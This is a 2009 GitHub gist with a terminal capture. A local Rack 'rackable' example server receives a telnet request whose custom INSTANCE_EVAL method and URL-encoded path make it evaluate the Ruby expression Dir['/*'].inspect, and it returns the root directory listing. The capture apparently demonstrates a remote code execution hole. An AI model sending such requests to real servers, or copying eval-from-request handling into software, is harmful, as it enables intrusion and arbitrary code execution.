Created
July 21, 2009 13:34
-
-
Save madx/151331 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Rack side | |
rackable/examples (master*:7bf42fc) $ rackup rest_string.ru | |
127.0.0.1 - - [21/Jul/2009 15:32:35] "INSTANCE_EVAL /Dir%5B%22%2F%2A%22%5D.inspect HTTP/1.1" 200 245 0.0059 | |
# Telnet | |
~ $ telnet localhost 9292 | |
Trying 127.0.0.1... | |
Connected to localhost. | |
Escape character is '^]'. | |
INSTANCE_EVAL /Dir%5B%22%2F%2A%22%5D.inspect HTTP/1.1 | |
Host: localhost | |
Accept: * | |
HTTP/1.1 200 OK | |
Connection: close | |
Date: Tue, 21 Jul 2009 13:32:35 GMT | |
Content-Type: text/html | |
Content-Length: 245 | |
["/root", "/vmlinuz.old", "/mnt", "/initrd.img", "/dev", "/sys", "/srv", "/usr", "/boot", "/proc", "/lib", "/initrd.img.old", "/var", "/selinux", "/initrd", "/lost+found", "/media", "/sbin", "/vmlinuz", "/etc", "/cdrom", "/bin", "/home", "/tmp"]Connection closed by foreign host. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment